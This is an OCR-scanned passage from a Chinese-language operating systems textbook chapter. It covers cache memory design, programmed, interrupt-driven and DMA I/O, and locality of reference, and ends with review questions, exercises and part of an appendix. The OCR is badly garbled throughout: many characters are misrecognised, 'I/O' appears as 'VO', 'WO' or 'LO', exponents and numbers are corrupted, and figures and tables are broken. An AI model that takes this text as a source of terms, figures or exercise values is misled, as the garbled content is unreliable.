据 先 被 读 入 高 速 缓存 ， 然 后 该 字 节 或 字 从 高 速 缓存 传递 给 处 理 器 。 由 于 访问 局 部 性 现象 的 存在 ， 
当 一 块 数据 被 取 入 高 速 缓存 以 满足 一 次 存储 器 访问 时 ， 很 可 能 紧 接 着 的 多 次 访问 的 数据 是 该 块 中 
的 其 他 字 节 。 


块 传送 


字 节 或 字 传送 
me 





图 1.16 高 速 缓存 各 内存 


图 1.17 描述 了 高 速 缓存 /内 存 的 系统 结构 。 内 存 由 2 个 可 寻 址 的 字 组 成 ,每 个 字 有 一 个 唯一 
Won 位 地 址 。 为 便于 上 映射， 此 存储 器 可 以 看 做 是 由 一 些 固定 大 小 的 块 组 成 ， 每 块 包含 KTS, 
也 就 是 说 ,一 共有 M=2”/ 天 个 块 。 高 速 缓 存 中 有 CAER (slot, WH line), BSAA KT 
字 ， 槽 的 数目 远 远 小 于 存储 器 中 块 的 数目 〈( C<<M) e。 内 存 中 块 的 某 些 子 集 驻 留 在 高 速 缓存 的 模 
中， 如 果 读 存储 器 中 某 一 个 块 的 某 一 个 字 ， 而 这 个 块 又 不 在 槽 中 ， 则 这 个 块 被 转移 到 一 个 术 中 。 
由 于 块 的 数目 比 槽 多 ， 一 个 槽 不 可 能 唯一 或 永久 对 应 于 一 个 块 。 因 此 ， 每 个 模 中 有 一 个 标签 ， 用 
以 标识 当前 存储 的 是 哪 一 个 块 。 标 签 通 常 是 地 址 中 较 高 的 若干 位 ， 表 示 以 这 些 位 开始 的 所 有 地 址 。 

举 一 个 简单 的 例子 ,假设 我 们 有 一 个 6 位 地 址 和 2 位 标签 。 标 签 01 表示 由 下 列 地 址 单元 组 
成 的 块 : 010000、010001、010010、010011、010100、010101、010110、010111、011000、011001、 
011010、011011、011100、011101、011110、011111。 


日 ”符号 << 表 示 远 远 小 于 ; 类 似 地 ， 符 号 >> 表 示 远 远大 于 。 
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a) 高 速 缓存 b) AF 
A117 高 速 缓 存 /内 存 的 结构 


图 1.18 显示 了 读 操作 的 过 程 。 处 理 器 生成 要 读 的 字 的 地 址 RA， 如 果 这 个 字 在 高 速 缓存 
中 ， 它 将 被 传递 给 处 理 器 ; 否则 ， 包 含 这 个 字 的 块 将 被 装 人 高 速 缓存 ， 然 后 这 个 字 被 传递 给 
处 理 器 。 





图 1.18 高 速 缓存 读 操作 


1.6.3 ”高 速 缓 存 设计 

有 关 高 速 缓存 设计 的 详细 内 容 已 超出 了 本 书 的 范围 , 这 里 只 简单 地 概括 主要 的 设计 因素 。 我 
们 将 会 看 到 在 进行 虚拟 存储 器 和 磁盘 高 速 缓存 设计 时 , 也 必须 解决 类 似 的 设计 问题 。 这 些 问题 可 
分 为 : 高 速 缓存 大 小 、 块 大 小 、 映 射 函 数 、 替 换算 法 、 写 策略 。 

前 面 已 经 讨论 了 高 速 缓存 大 小 的 问题 ， 结 论 是 适当 小 的 高 速 缓存 可 以 对 性 能 产生 显著 的 影 
响 。 另 一 个 尺寸 问题 是 关于 块 大 小 的 , 即 高 速 缓存 与 内 存 间 的 数据 交换 单位 。 当 抉 大 小 从 很 小 增 
长 到 很 大 时 ,由 于 局 部 性 原理 ,命中 率 首 先 会 增加 。 局 部 性 原理 指 的 是 位 于 被 访问 字 附 近 的 数据 
”在 近期 被 访问 到 的 概率 比较 大 。 当 块 大 小 增 大 时 ,更 多 的 有 用 数据 被 取 到 高 速 缓存 中 。 但 是 , 当 
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块 变 得 更 大 时 ,新 近 取 到 的 数据 被 用 到 的 可 能 性 开始 小 于 那些 必须 移出 高 速 缓存 的 数据 再 次 被 用 
到 的 可 能 性 (移出 高 速 缓存 是 为 了 给 新 块 让 出 位 置 )， 这 时 命中 率 反 而 开始 降低 。 

当 一 个 新 块 被 读 人 人 高速 缓存 中 时 , 由 映射 函数 确定 这 个 块 将 占据 哪个 高 速 缓 存单 元 。 设计 映 
射 函 数 要 考虑 两 方面 的 约束 。 首先 ， 当 读 入 一 个 块 时 ， 另 一 个 块 可 能 会 被 替换 出 高 速 缓存 。 替 换 
方法 应 该 能 够 尽量 减 小 蔡 换 出 的 块 在 不 久 的 将 来 还 会 被 用 到 的 可 能 性 。 映 射 函 数 设计 得 越 灵活 ， 
就 有 更 大 的 余地 来 设计 出 可 以 增 大 命中 率 的 葵 换 算法 。 其 次 , 如 果 映 射 函 数 越 灵活 ， 则 完成 搜索 
以 确定 某 个 指定 块 是 否 位 于 高 速 缓存 中 的 功能 所 需要 的 逻辑 电路 也 就 越 复杂 。 

在 映射 函数 的 约 东 下 ， 当 一 个 新 块 加 入 到 高 速 缓存 中 时 ， 如 果 高 速 缓存 中 的 所 有 存储 槽 都 
已 被 别 的 块 占 满 , 那么 蔡 换算 法 要 选择 替换 不 久 的 将 来 被 访问 的 可 能 性 最 小 的 块 。 尽 管 不 可 能 
找到 这 样 的 块 , 但 是 合理 且 有 效 的 策略 是 替换 高 速 缓存 中 最 长 时 间 未 被 访问 的 块 。 这 个 策略 称 
做 最 近 最 少 使 用 ( Least-Recently-Used，LRU ) 算法 。 标 识 最 近 最 少 使 用 的 块 需要 硬件 机 制 
支持 。 

如 果 高 速 缓存 中 某 个 块 的 内 容 被 修改 , 则 需要 在 它 被 换 出 高 速 缓存 之 前 把 它 写 回 内 存 。 写 策 
略 规定 何 时 发 生存 储 器 写 操 作 。 一 种 极端 情况 是 每 当 块 被 更 新 后 就 发 生 写 操作 ; 而 另 一 种 极端 情 
况 是 只 有 当 块 被 替换 时 才 发 生 写 操作 。 后 一 种 策略 减少 了 存储 器 写 操作 的 次 数 , 但 是 使 内 存 处 于 
一 种 过 时 的 状态 ， 这 会 妨碍 多 处 理 器 操作 以 及 VO 模块 的 直接 内 存 存 取 。 


1.7 W/O 通信 技术 

对 VO 操作 有 三 种 可 能 的 技术 : 可 编程 YO、 中断 驱动 TO、 直 接 内 存 存 取 (DMA), 
1.7.1 可 编程 VO 

当 处 理 器 正在 执行 程序 并 遇 到 一 个 与 VO 相关 的 指令 时 , 它 通过 给 相应 的 IO 模块 发 命令 来 
执行 这 个 指令 。 使 用 可 编程 VO 操作 时 ，L/O 模块 执行 请 求 的 动作 并 设置 VO 状态 寄存 器 中 相应 
的 位 ， 它 并 不 进一步 通知 处 理 器 ， 尤 其 是 它 并 不 中 断 处 理 器 。 因 此 处 理 器 在 执行 WO 指令 后 ,还 
要 定期 检查 IO 模块 的 状态 ， 以 确定 IO 操作 是 否 已 经 完成 。 

如 果 使 用 这 种 技术 , 处 理 器 负责 从 内 存 中 提取 数据 以 用 于 输出 , 并 在 内 存 中 保存 数据 以 用 于 
输入 。LO 软件 应 该 设计 为 由 处 理 器 执行 直接 控制 TO 操作 的 指令 ， 包 括 检测 设备 状态 、 发 送 读 
命令 或 写 命令 和 传送 数据 ， 因 此 指令 集中 包括 以 下 几 类 LO 指令 : 

o 控制 : 用 于 激活 外 部 设备 ， 并 告诉 它 做 什么 。 例 如 ， 可 以 指示 磁带 倒退 或 前 移 一 个 记录 。 

@ KA: 用 于 测试 与 IO 模块 及 其 外 围 设备 相关 的 各 种 状态 条 件 。 

o 传送 : 用 于 在 存储 器 寄存 器 和 外 部 设备 间 读 数据 或 写 数据 。 

图 1.19a 给 出 了 使 用 可 编程 IO 的 一 个 例子 : 从 外 部 设备 读 取 一 块 数据 (如 磁带 中 的 一 条 记 
录 ) 到 存储 器 ， 每 次 读 一 个 字 (例如 16 位 ) 的 数据 。 对 读 和 人 的 每 个 字 ， 处 理 器 必须 停留 在 状态 
检查 周期 ， 直 到 确定 该 字 已 经 在 IO 模块 的 数据 寄存 器 中 了 。 这 个 流程 图 说 明了 该 技术 的 主要 缺 
点 : 这 是 一 个 耗 时 的 处 理 ， 处 理 器 总 是 处 于 没有 用 的 繁忙 中 。 


1.7.2 中断 驱动 /O 


可 编程 VO 的 问题 是 处 理 器 通常 必须 等 待 很 长 的 时 间 ， 以 确定 IO 模块 是 否 做 好 了 接收 或 发 
送 更 多 数据 的 准备 。 处 理 器 在 等 待 期 间 必 须 不 断 地 询问 WO 模块 的 状态 , 其 结果 是 严重 地 降低 了 
整个 系统 的 性 能 。 
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CPU 一 IO 
__- -做 其 他 一 
些 事情 


给 V0 模块 给 IO BUR 
o 发 出 读 命令 





4 i 给 VO 模块 j CPUS DMA 
CPU 一 存储 器 CPU 一 存储 器 发 出 读 块 命令 = fete 





下 一 条 指令 下 一 条 指令 下 一 条 指令 
a) 程序 控制 VO b) RRA VO c) 直接 存储 器 存 取 
图 1.19 用 于 输入 一 块 数据 的 三 种 技术 


另 一 种 选择 是 处 理 器 给 模块 发 送 IO 命令 ， 然 后 继续 做 其 他 一 些 有 用 的 工作 。 当 VO 模块 准 
备 好 与 处 理 器 交换 数据 时 , 它 将 打 断 处 理 器 的 执行 并 请 求 服务 。 处 理 器 和 前 面 一 样 执行 数据 传送 ， 
然后 恢复 处 理 器 以 前 的 执行 过 程 。 

首先 ， 从 IO 模块 的 角度 考虑 这 是 如 何 工 作 的 。 对 于 输入 操作 ，LO 模块 从 处 理 器 中 接收 一 
个 READ 命令 ， 然 后 开始 从 相关 的 外 围 设备 读数 据 。 一 旦 数据 被 读 人 该 模块 的 数据 寄存 器 ， 模 
块 通过 控制 线 给 处 理 器 发 送 一 个 中 断 信号 , 然后 等 待 直到 处 理 器 请 求 该 数据 。 当 处 理 器 发 出 这 个 
请 求 后 ,模块 把 数据 放 到 数据 总 线 上 ， 然 后 准备 下 一 次 的 IO 操作 。 

从 处 理 器 的 角 看 度 ， 输 入 操作 的 过 程 如 下 : 处 理 器 发 一 个 READ 命令 ， 然 后 保存 当前 程序 
的 上 下 文 《如 程序 计数 器 和 处 理 器 寄存 器 )， 离 开 当 前 程序 ， 去 做 其 他 事情 ( 例如 ， 处 理 器 可 以 
同时 在 几 个 不 同 的 程序 中 工作 )。 在 每 个 指令 周期 的 末尾 ,处理 器 检查 中 断 ( 见 图 1.7 )。 当 发 生 
来 自 IO 模块 的 中 汤 时 ， 处 理 器 保存 当前 正在 执行 的 程序 的 上 下 文 ， 开 始 执行 中 断 处 理 程序 
( interrupt-handling program ) 处 理 此 中 断 。 在 这 个 例子 中 ， 处 理 器 从 VO 模块 中 读 取 数据 ， 并 保 
存在 存储 器 中 。 然 后 ， 恢 复发 出 IO 命令 的 程序 (或 其 他 某 个 程序 ) 的 上 下 文 并 继续 执行 。 

图 1.19b 给 出 了 使 用 中 断 驱动 IO 读数 据 块 的 例子 。 中 断 驱 动 VO 比 可 编程 IO 更 有 效 ， 这 
是 因为 它 消 除了 不 必要 的 等 待 。 但 是 ， 由 于 数据 中 的 每 个 字 不 论 从 存储 器 到 IO 模块 还 是 从 VO 
模块 到 存储 器 都 必须 通过 处 理 器 处 理 ， 这 导致 中 断 驱 动 IO 仍然 会 花费 很 多 处 理 器 时 间 。 

计算 机 系统 中 不 可 避免 有 多 个 IO 模块 ， 因 此 需要 一 定 的 机 制 ， 使 得 处 理 回 能 够 确定 中 断 
是 由 哪个 模块 引发 的 , 并 且 在 多 个 中 断 产 生 的 情况 下 处 理 咒 要 决定 先 处 理 哪 一 个 。 在 某 些 系统 
中 有 多 条 中 断 线 ， 这 样 每 个 模块 可 在 不 同 的 线 上 发 送 中 断 信号 ， 每 个 中 断 线 有 不 同 的 优先 级 。 
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当然 ， 也 可 能 只 有 一 个 中 断 线 ， 但 要 使 用 额外 的 线 保 存 设 备 地 址 ， 而 且 不 同 的 设备 有 不 同 的 优 
FER. 


173 直接 内 存 存 取 


尽管 中 断 驱 动 WO 比 简单 的 可 编程 VO 更 有 效 ， 但 处 理 器 仍然 需要 主动 干预 在 存储 器 和 VO 
模块 之 间 的 数据 传送 , 并 且 任 何 数 据 传送 都 必须 完全 通过 处 理 器 。 因 此 这 两 种 IO 形式 都 有 两 方 
面 固有 的 缺陷 : 

1) W/O 传送 速度 受 限于 处 理 器 测试 设备 和 提供 服务 的 速度 。 

2) 处 理 器 忙于 管理 WO 传送 的 工作 ， 必 须 执 行 很 多 指令 以 完成 IO 传送 。 

当 需 要 移动 大 量 的 数据 时 ， 需 要 使 用 一 种 更 有 效 的 技术 : 直接 内 存 存 取 (DMA), DMA 功 
能 可 以 由 系统 总 线 中 一 个 独立 的 模块 完成 ， 也 可 以 并 人 到 一 个 IO 模块 中 。 不 论 采 用 哪 种 形式 ， 
该 技术 的 工作 方式 如 下 所 示 : 当 处 理 器 要 读 或 写 一块 数 据 时 ， 它 给 DMA 模块 产生 一 条 命令 ， 发 
送 以 下 信息 : 

@ 是 否 请 求 一 次 读 或 写 。 

o 涉及 的 IO 设备 的 地 址 。 

@ 开始 读 或 写 的 存储 器 单元 。 

@ 需要 读 或 写 的 字数 。 

之 后 处 理 器 继续 其 他 工作 。 处理 器 把 这 个 操作 委托 给 DMA 模块 , 由 该 模块 负责 处 理 。DMA 
模块 直接 与 存储 器 交互 , 传送 整个 数据 块 ， 每 次 传送 一 个 字 。 这 个 过 程 不 需要 处 理 器 参与 。 当 传 
送 完 成 后 ，DMA 模块 发 一 个 中 断 信号 给 处 理 器 。 因 此 只 有 在 开始 传送 和 传送 结束 时 处 理 器 才 会 
参与 (RA 1.190) 

DMA 模块 需要 控制 总 线 以 便 与 存储 器 进行 数据 传送 。 由 于 在 总 线 使 用 中 存在 竞争 ， 当 处 理 
器 需要 使 用 总 线 时 要 等 待 DMA 模块 。 注 意 ,， 这 并 不 是 一 个 中 断 ， 处 理 器 没有 保存 上 下 文 环境 去 
做 其 他 事情 , 而 是 仅仅 暂停 一 个 总 线 周期 (在 总 线 上 传输 一 个 字 的 时 间 )。 其 总 的 影响 是 在 DMA 
传送 过 程 中 ， 当 处 理 器 需要 访问 总 线 时 处 理 器 的 执行 速度 会 变 慢 。 尽 管 如 此 ,对 多 字 LO 传送 来 
说 ，DMA 比 中 断 驱 动 和 程序 控制 IO 更 有 效 。 


1.8 推荐 读物 和 网 站 


[ STAL06 ] 中 更 详细 地 讲述 了 本 章 中 的 所 有 主题 ， 此 外 还 有 很 多 关于 计算 机 组 织 与 系统 结构 的 其 他 书 
籍 。 更 值得 一 读 的 有 [ PATT07 ] 和 [ HENN07 ]， 前 者 是 一 本 全 面 的 综述 ， 后 者 是 一 本 更 高 级 的 书籍 ， 重 点 
讲述 设计 的 定量 特征 。 
[DENN05] 讲 述 了 局 部 性 原理 的 发 展 和 应 用 ， 感 兴趣 的 读者 可 以 一 读 。 
DENNOS Denning,P. “The Locality Principle” Communications of the ACM,July 2005. 
HENNO7 Hennessy,J.,and Patterson,D.Computer Architecture:A Quantitative Approach. San Mateo,CA: 
Morgan Kaufmann,2007. 

PATTO7 Patterson,D.,and Hennessy,J.Computer Organization and Design:The Hardware/ Software 
Interface. San Mateo,CA:Morgan Kaufmann,2007. 

STAL06 Stallings,W.Computer Organization and Architecture,7th ed.Upper Saddle River,NJ:Prentice 
Hall,2006. 


推荐 网 站 


@ WWW Computer Architecture Home Page: 提供 与 计算 机 体系 结构 研究 人 员 相 关 的 信息 索引 ， 包 
括 体系 结构 组 和 项 目 、 技 术 组 织 、 文 献 、 招 聘 和 商业 信息 。 
© CPU info Center: 关于 特定 处 理 器 的 信息 ， 包 括 论文 、 产 品 信 息 和 最 新 通告 。 


FIFE FADARE 25 


1.9 关键 术语 、 复 习题 和 习题 


地 址 寄存 器 变 址 寄存 器 局 部 性 辅助 存储 器 
高 速 缓存 输入 /输出 (IO ) 内 存 段 指针 
RRB 指令 多 道 程 序 设 计 空间 局 部 性 
中 央 处 理 单元 (CPU ) 指令 周期 Rb FASE 栈 
条 件 码 指令 寄存 器 程序 计数 器 FR in 
数据 寄存 器 FP 可 编程 O 栈 指针 
直接 内 存 存 取 (DMA) 中 断 驱动 IO 可 重信 人 过程 系统 总 线 
命中 率 VO 模块 寄存 器 时 间 局 部 性 

复习 题 

1.1 列 出 并 简要 地 定义 计算 机 的 4 个 主要 组 成 部 分 。 

1.2 ”定义 处 理 器 寄存 器 的 两 种 主要 类 别 。 

1.3 ”一 般 而 言 ， 一 条 机 器 指令 能 指定 的 4 种 不 同 的 操作 是 什么 ? 

1.4 什么 是 中 断 ? 

1.5 ”多 中 断 的 处 理 方式 是 什么 ? 

16 内存 层 次 的 各 个 元 素 间 的 特征 是 什么 ? 

1.7 什么 是 高 速 缓存 ? 


1.8 
1.9 


列 出 并 简要 地 定义 WO 操作 的 三 种 技术 。 
空间 局 部 性 和 时 间 局 部 性 的 区 别 是 什么 ? 


1.10 开发 空间 局 部 性 和 时 间 局 部 性 的 策略 是 什么 ? 
习题 


1.1 


1.2 
1.3 


1.4 


假设 图 1.3 中 的 理想 处 理 器 还 有 两 个 WO 指令 和 一 个 减 指 令 : 
0011 = 从 To PRA AC 
0111 把 AC 保存 到 VO 中 
0100 从 AC 中 减 去 指定 字 的 内 容 
在 这 种 情况 下 ， 使 用 12 位 地 址 标识 一 个 特殊 的 外 部 设备 。 请 给 出 以 下 程序 的 执行 过 程 (按照 图 


“1.4 的 格式 )。 


a) 从 设备 4 中 载 人 AC。 
b) 减 去 存储 器 单元 960 的 内 容 。 
c) 把 AC 保存 到 设备 5 中 。 
假设 从 设备 5 中 取 到 的 下 一 个 值 为 10，960 单元 中 的 值 为 1。 
本 章 中 用 6 个 步 又 来 描述 图 1.4 中 的 程序 执行 情况 ， 请 使 用 MAR 和 MBR 扩充 这 个 描述 。 
假设 有 一 个 32 位 微 处 理 器 ,其 32 位 的 指令 由 两 个 域 组 成 : 第 一 个 字 节 包含 操作 码 ， 其 余部 分 为 一 个 
直接 操作 数 或 一 个 操作 数 地 址 。 
a) 最 大 可 直接 寻 址 的 存储 器 能 力 为 多 少 (以 字 节 为 单位 2 
b) 如 果 微 处 理 器 总 线 具 有 下 面 的 情况 ， 请 分 析 对 系统 速度 的 影响 : 
D 一 个 32 位 局 部 地 址 总 线 和 一 个 16 位 局 部 数据 总 线 ， 或 者 
@@ 一 个 16 位 局 部 地 址 总 线 和 一 个 16 位 局 部 数据 总 线 
c) 程序 计数 器 和 指令 寄存 器 分 别 需要 多 少 位 ? 
假设 有 一 个 微 处 理 器 产生 一 个 16 位 的 地 址 ( 例如 ,假设 程序 计数 器 和 地 址 寄存 器 都 是 16 位 ) 并 且 具 
有 一 个 16 位 的 数据 总 线 。 
a) 如 果 连 接 到 一 个 16 位 存储 器 上 ， 处 理 器 能 够 直接 访问 的 最 大 存储 器 地 址 空间 为 多 少 ? 
b) 如 果 连 接 到 一 个 8 位 存储 器 上 ， 处 理 器 能 够 直接 访问 的 最 大 存储 器 地 址 空间 为 多 少 ? 
c) 处 理 访问 一 个 独立 的 VO 空间 需要 哪些 结构 特征 ? 
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1.7 


1.8 


1.9 


1. 
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1.11 
1.12 


1.14 





d) 如 果 输 入 指令 和 输出 指令 可 以 表示 8 位 LO 端口 号 ， 这 个 微 处 理 器 可 以 支持 多 少 8 vO 端口 ? 
考虑 一 个 32 位 微 处 理 器 ， 它 有 一 个 16 位 外 部 数据 总 线 ， 并 由 一 个 8MHz 的 输入 时 钟 驱动 。 假 设 这 个 
微 处 理 器 有 一 个 总 线 周期 ， 其 最 大 持续 时 间 等 于 4 个 输入 时 钟 周 期 。 请 问 该 微 处 理 器 可 以 支持 的 最 大 
数据 传送 速度 为 多 少 ? 外 部 数据 总 线 增加 到 21 位 ， 或 者 外 部 时 钟 频率 加 倍 ， 哪 种 措施 可 以 更 好 地 提 
高 处 理 器 性 能 ?请 叙述 你 的 设想 并 解释 原因 。( 提示 : 确定 每 个 总 线 周 期 能 够 传送 的 字 节 数 。) 
考虑 一 个 计算 机 系统 ， 它 包含 一 个 WO 模块 ， 用 以 控制 一 台 简 单 的 键盘 /打印 机 电 传 打字 设备 。CPU 
中 包含 下 列 寄存 器 ， 这 些 寄存 器 直接 连接 到 系统 总 线 上 : 
INPR: 输入 寄存 器 ，8 位 
OUTR: 输出 寄存 器 ，8 位 
FGI: 输入 标记 ，1 位 
FGO: 输出 标记 ，1 位 
TEN: 中 断 允许 ，1 位 
VO 模块 控制 从 打字 机 中 输入 击 键 , 并 输出 到 打印 机 中 去 。 打 字 机 可 以 把 一 个 字母 数字 符号 编码 成 
一 个 8 位 字 ， 也 可 以 把 一 个 8 位 字 解 码 成 一 个 字母 数字 符号 。 当 8 位 字 从 打字 机 进入 输入 寄存 器 时 ， 
输入 标记 被 置 位 ; 当 打 印 一 个 字 时 ， 输 出 标记 被 置 位 。 
a) 描述 CPU 如 何 使 用 这 4 个 寄存 器 实现 与 打字 机 间 的 输入 /输出 。 
b) 描述 通过 使 用 IEN， 如 何 提高 执行 效率 ? 
实际 上 在 所 有 包括 DMA 模块 的 系统 中 ，DMA 访问 内 存 的 优先 级 总 是 高 于 处 理 器 访问 内 存 的 优先 级 。 
这 是 为 什么 ? 
一 个 DMA 模块 从 外 部 设备 给 内 存 传送 字符 ， 传 送 速 度 为 9600 位 每 秒 ( b/s )。 处 理 器 可 以 以 每 秒 100 
万 次 的 速度 取 指 令 ， 由 于 DMA 活动 ， 处 理 器 的 速度 将 会 减 慢 多 少 ? 
一 台 计 算 机 包括 一 个 CPU 和 一 台 WO 设备 D, 通过 一 条 共享 总 线 连接 到 内 存 M, 数据 总 线 的 宽度 为 1 
个 字 。CPU 每 秒 最 多 可 执行 106 条 指令 , 平均 每 条 指令 需要 5 个 处 理 器 周期 ， 其 中 3 个 周期 需要 使 用 
存储 器 总 线 。 存 储 器 读 / 写 操作 使 用 1 个 处 理 器 周期 。 假 设 CPU 正在 连续 不 断 地 执行 后 台 程序 ， 并 且 
需要 保证 95% 的 指令 执行 速度 ,但 没有 任何 WO 指令 。 假 设 1 个 处 理 器 周期 等 于 1 个 总 线 周期 ， 现 在 
要 在 M 和 DD 之 间 传 送 大 块 数据 。 
a) 车 使 用 程序 控制 TO，LO 每 传送 1 个 字 需 要 CPU 执行 两 个 指令 ,请 估计 通过 DD 的 VO 数据 传送 的 
最 大 可 能 速度 。 
b) 如 果 使 用 DMA 传送 ,请 估计 传送 速度 。 
考虑 以 下 代码 ; l 
for(i=0; i<5; i++) 
for(j=0; j<5; j++) 
for (k=0; k<5; k++) 
a[j]=a[j]+i*k; 
a) 定义 访问 局 部 性 概念 ， 并 讨论 在 上 面 代码 中 的 访问 局 部 性 。 
b) 对 上 面 的 代码 ， 请 举例 说 明 在 计算 机 存储 体系 中 操作 系统 是 如 何 应 用 访问 局 部 性 原理 的 。 
请 将 附录 LA 中 的 式 (1.1) AR (1.2) 推广 到 级 存储 器 层次 结构 中 。 
考虑 一 个 存储 器 系统 ， 它 具有 以 下 参数 : 
T. = 100ns C= 0.005 分 /位 
Tm = 1 000ns Cm = 0.0002 分 /位 
a) 5MB 的 内 存 价格 为 多 少 ? 
b) 使 用 高 速 缓存 技术 ，5MB 的 内 存 价格 为 多 少 ? 
c) 如 果 有 效 存 取 时 间 比 高 速 缓存 存 取 时 间 多 20%, mP HRES? 
一 台 计 算 机 包括 高 速 缓 存 、 内 存 和 一 个 用 作 虚 拟 存储 器 的 磁盘 。 如 果 要 存 取 的 字 在 高 速 缓存 中 ， 存 
取 需 要 15ns; 如 果 该 字 在 内 存 中 而 不 在 高 速 缓存 中 ， 把 它 载 人 高 速 缓存 需要 4S$ns ( 包括 初始 检查 高 
速 缓存 的 时 间 )， 然 后 再 重新 开始 存 取 ; 如 果 该 字 不 在 内 存 中 ， 需 要 10ms 从 磁盘 中 取出 该 字 ， 复制 
到 高 速 缓存 中 还 需要 45ns， 然 后 再 重新 开始 存 取 。 高 速 缓存 的 命中 率 为 0.8， 内 存 的 命中 率 为 0.7， 
旭 该 系统 中 存 取 一 个 字 的 平均 存 取 时 间 是 多 少 (单位 : ns)? 
假设 处 理 器 使 用 一 个 栈 来 管理 过 程 调用 和 返回 。 请 问 可 以 取消 程序 计数 器 而 用 栈 指针 代替 吗 ? 
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附录 1A ”两 级 存储 器 的 性 能 特征 


在 本 章 中 ,通过 使 用 高 速 缓存 作为 内 存 和 处 理 器 间 的 缓冲 器 ， 建 立 了 一 个 两 级 内 部 存储 器 。 这 个 
两 级 结构 通过 开发 局 部 性 ， 相 对 于 一 级 存储 器 提供 了 更 高 的 性 能 。 本 附录 将 探讨 局 部 性 。 

内 存 高 速 缓存 机 制 是 计算 机 系统 结构 的 一 部 分 ， 它 由 硬件 实现 ， 通 常 对 操作 系统 是 不 可 见 的 。 因 此 ， 
本 书 不 再 讨论 这 个 机 制 , 但 是 还 有 其 他 两 种 两 级 存储 器 方法 : 虚拟 存储 器 和 磁盘 高 速 缓存 ( 见 表 1.2 ) 也 使 
用 了 局 部 性 , 并 且 至 少 有 一 部 分 是 由 操作 系统 实现 的 。 我 们 将 在 第 8 章 和 第 11 章 分 别 讨论 它们 。 本 附录 中 
将 介绍 对 三 种 方法 都 适用 的 两 级 存储 器 的 性 能 特征 。 


R12 两 级 存储 器 的 特征 


类 别 内 存 高 速 缓存 虚拟 存储 器 〈 页 面 调 度 ) 磁盘 高 速 缓存 
典型 的 存 取 时 间 比 5:1 106:1 106:1 
内 存 管理 系统 由 特殊 的 硬件 实现 硬件 和 系统 软件 的 结合 系统 软件 
典型 的 块 大 小 4 到 128 字 节 64 到 4096 字 节 64 到 4096 字 节 
处 理 器 访问 的 第 二 级 直接 访问 间接 访问 间接 访问 
局 部 性 


两 级 存储 器 提高 性 能 的 基础 是 局 部 性 原理 ， 这 在 1.5 节 中 曾经 提 到 过 。 这 个 原理 声明 存储 器 访问 表现 
出 簇 聚 性 。 在 很 长 的 一 段 时 间 中 ， 使 用 的 篮 会 变化 ， 但 在 很 短 的 时 间 内 ， 处 理 器 基本 上 只 与 存储 器 访问 中 
的 一 个 固定 的 艇 打交道 。 

局 部 性 原理 是 很 有 效 的 ， 原 因 如 下 : 

1) 除了 分 支 和 调用 指令 ， 程 序 执行 都 是 顺序 的 ， 而 这 两 类 指令 在 所 有 程序 指令 中 只 占 了 一 小 部 分 。 

因此 ， 大 多 数 情况 下 ， 要 取 的 下 一 条 指令 都 是 紧 跟 在 取 到 的 上 一 条 指令 之 后 的 。 

2) 很 少 会 出 现 很 长 的 连续 不 断 的 过 程 调用 序列 ， 继 而 是 相应 的 返回 序列 。 相 反 ， 程 序 中 过 程 调用 的 

深度 窗口 限制 在 一 个 很 小 的 范围 内 ， 因 此 在 较 短 的 时 间 中 ， 指 令 的 引用 局 限 在 很 少 的 几 个 过 程 中 。 

3) 大 多 数 循环 结构 都 由 相对 比较 少 的 几 个 指令 重复 若干 次 组 成 的 。 在 循环 过 程 中 ， 计 算 被 限制 在 程 

序 中 一 个 很 小 的 相 邻 部 分 中 。 
4) 在 许多 程序 中 ， 很 多 计算 都 涉及 处 理 诸如 数组 、 记 录 序 列 之 类 的 数据 结构 。 在 大 多 数 情况 下 ， 对 
这 类 数据 结构 的 连续 引用 是 对 位 置 相 邻 的 数据 项 进行 操作 。 

以 上 原因 在 很 多 研究 中 都 得 到 了 证 实 。 关 于 第 1 ) 点 ， 有 各 种 分 析 高 级 语言 程序 行为 的 研究 ， 表 1.3 
列 出 了 在 执行 过 程 中 各 种 语句 类 型 出 现 频率 的 主要 结果 ， 这 些 结果 来 自 下 面 的 研究 。Knuth [ KNUT71] 分 
析 了 用 于 学 生 实 习 的 一 组 FORTRAN 程序 , 这 是 最 早 关 于 程序 设计 语言 行为 的 研究 。Tanenbaum [ TANE78 | 
收集 了 用 于 操作 系统 程序 的 300 多 个 过 程 ， 这 些 过 程 用 支持 结构 化 程序 设计 的 语言 (SAL) 编写 ， 并 发 表 
了 测量 结果 。Patterson M Sequin [ PATT82 ] 分 析 了 一 组 取 自 编译 器 和 用 于 排版 、 计 算 机 辅助 设计 CCAD), 
排序 和 文件 比较 的 程序 的 测量 结果 ， 还 研究 了 程序 设计 语言 C 和 Pascal, Huck [ HUCK83 ] 分 析 了 用 于 表 
示 各 种 通用 的 科学 计算 的 4 个 程序 ， 包 括 快 速 傅立叶 变换 和 各 种 微分 方程 。 关 于 这 些 语言 和 应 用 的 研究 达 
成 了 一 致 的 结果 : 在 一 个 程序 的 生命 周期 中 ,分 支 和 调用 指令 仅 占 了 执行 语句 中 的 一 小 部 分 。 因 此 ， 这 些 
研究 证 实 了 前 面 给 出 的 断言 1 )。 


表 1.3 高 级 语言 操作 中 的 相对 动态 
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关于 断言 2 )，[ PATT85 ] 中 的 研究 提供 了 证 实 ， 这 可 用 图 1.20 说 明 。 图 1.20 最 示 了 调用 -返回 行为 ， 
每 次 调用 以 向 下 和 向 右 的 线 表示 ， 每 次 返回 以 向 上 积 向 右 的 线 表示 ， 图 中 定义 的 深度 窗口 等 于 5。 只 有 调 
用 返回 序列 在 任何 一 个 方向 上 的 移动 为 6 时 ， 才 引起 窗口 移动 。 正 如 在 图 中 所 看 到 的 ， 正 在 执行 的 程序 在 
一 个 固定 窗口 中 保留 了 很 长 的 一 段 时 间 。 同 样 ， 对 C 和 Pascal 程序 的 分 析 表 明 ， 对 深度 为 8 的 窗口 ， 只 有 
1% 的 调用 或 返回 需要 移动 [ TAMI83 ]。 
时 间 
(以 调用 /返回 为 单位 》 





图 1.20 程序 的 调用 返回 行为 示例 


局 部 性 原理 在 近期 的 很 多 研究 中 也 不 断 得 到 证 实 。 例 如 ， 图 1.21 显示 了 在 一 个 站 点 上 关于 Web 页 访 
问 模 式 的 研究 [BAEN97 ]。 
空间 局 部 性 和 时 间 局 部 性 是 有 区 别 的 。 空 间 局 部 性 
( spatial locality ) 指 执行 涉及 很 多 簇 诊 的 存储 器 单元 的 趋势 ， 
这 反映 了 处 理 器 顺序 访问 指令 的 倾向 , 同时, 也 反映 了 程序 顺 
序 访问 数据 单元 的 倾向 , 如 处 理 数据 表 。 时 间 局 部 性 ( temporal 
